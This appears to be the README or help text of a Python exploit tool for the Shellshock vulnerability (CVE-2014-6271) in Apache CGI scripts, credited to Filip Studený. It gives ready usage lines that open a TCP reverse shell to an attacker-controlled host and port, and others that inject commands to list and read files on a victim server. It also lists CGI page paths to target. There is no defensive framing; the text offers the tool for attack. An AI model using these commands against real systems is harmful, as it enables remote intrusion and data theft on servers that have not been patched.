[CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing
Shellshock Apache remote exploit
Usage:
./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"
Variables:
Victim:
rhost => Victim IP
rport => Victim PORT
Attacker (For reverse shell):
lhost => Attacker IP
lport => Attacker PORT for reverse shell
Echo:
echo => Custom command to inject
Examples:
echo="ls -la"
echo="cat file.txt"
Config:
pages => Specific cgi vulnerable pages
Exploitable pages:
[0] /cgi-sys/entropysearch.cgi",
[1] /cgi-sys/defaultwebpage.cgi",
[2] /cgi-mod/index.cgi",
[3] /cgi-bin/test.cgi",
[4] /cgi-bin-sdb/printenv
Payloads:
"reverse" => (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"files" => Read and browse through files (Requires: rhost, echo)
Created by Filip Studený